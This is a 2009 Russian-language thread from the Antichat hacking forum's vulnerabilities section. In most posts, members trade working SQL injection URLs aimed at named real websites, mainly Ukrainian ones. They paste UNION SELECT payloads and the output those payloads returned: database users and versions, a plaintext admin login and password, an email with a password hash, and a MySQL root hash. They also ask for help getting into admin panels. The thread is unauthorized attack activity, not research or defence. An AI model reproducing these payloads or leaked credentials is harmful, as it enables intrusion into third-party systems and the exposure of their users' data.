ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7381  
Старый 07.01.2009, 19:19
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

Цитата:
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +admin--
токо там по определенному ир(
логин и пасс adminus:lPO7YBB0
 
Ответить с цитированием

  #7382  
Старый 07.01.2009, 19:25
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от flem  
Код:
www.pogoda.ua/index.php?id=28+union+select+1,2,3,4,5/*
а тут вывода ненашол(
user(): u_pogodatwo@localhost
version(): 4.1.22
database(): pogodatwo
 
Ответить с цитированием

  #7383  
Старый 07.01.2009, 19:43
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

Цитата:
http://www.pogoda.ua/index.php?id=-28+union+select+1,concat(login,0x3a,password),3,4, 5+from+users+limit+0,1/*
докрутил до етого test:test
а вот табличку с админами ненашел(((
 
Ответить с цитированием

  #7384  
Старый 07.01.2009, 20:05
Аватар для flem
flem
Новичок
Регистрация: 17.05.2008
Сообщений: 14
Провел на форуме:
152087

Репутация: 12
По умолчанию

zifanchuck, ну вот одминка pogoda.ua/admin только вот test:test неподходит!
 
Ответить с цитированием

  #7385  
Старый 07.01.2009, 22:07
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

админку я тожєе нашол а вот пасс админа невыяснеил(((
 
Ответить с цитированием

  #7386  
Старый 07.01.2009, 22:25
Аватар для j0ker13
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

http://www.emayhem.com/profiles/profile.php?profile=1'
http://www.emayhem.com/profiles/profile.php?profile=-1+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&wId=4 => marty@localhost:5.0.37-log
http://www.emayhem.com/profiles/profile.php?profile=-1+union+select+1,2,concat_ws(0x3a,email,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+use rs+limit+0,1/*&wId=4 => marty@webmayhem.net:ad452de6a1c6876e66abe0e853b6c0 ad
че за хрень? версия 5 а не выводит из information_schema(( кто поможет?)
 
Ответить с цитированием

  #7387  
Старый 08.01.2009, 01:33
Аватар для ..::TROYAN::..
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

1.
Код:
http://www.flatlux.kiev.ua/rus/index.php?categoryID=-7+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6--
flatlux_ower@saturn:flatlux_main:4.1.22-log
PR:5
Тиц:160
2.
Код:
http://www.membrana.kiev.ua/catalogue.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11--
root@localhost:membrana:4.0.23a
PR:0
тИЦ: 10

Код:
http://www.membrana.kiev.ua/catalogue.php?id=-1+union+select+1,2,3,concat(user,0x3a,password,0x3a,file_priv),5,6,7,8,9,10,11+from+mysql.user--
root:4fc7a3a65139e6ae:N
3.
Код:
http://stroybat.kiev.ua/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--&showpage=1
stroybat_stroy1@localhost:stroybat_stroybat:5.0.51 a-community
PR:3
тИЦ: 30


Код:
http://stroybat.kiev.ua/index.php?pid=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables--&showpage=1
 
Ответить с цитированием

  #7388  
Старый 08.01.2009, 02:43
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://wow.cybergame.su/index.php?newsid=999999+union+select+1,version(),3,4,5,6%20--
Как можно посмотреть что выдало при такой скуле. Просто на экране ни че не видо или я не вижу -(
 
Ответить с цитированием

  #7389  
Старый 08.01.2009, 02:52
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

а там точно скуль??? я неуверен (я правда новичек)
я думаю там ее нету
 
Ответить с цитированием

  #7390  
Старый 08.01.2009, 03:18
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

Так я все таки прав?? мне кажеться что там иньектом и не пахнет.
А как там на самом деле.... может и есть там скуля
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ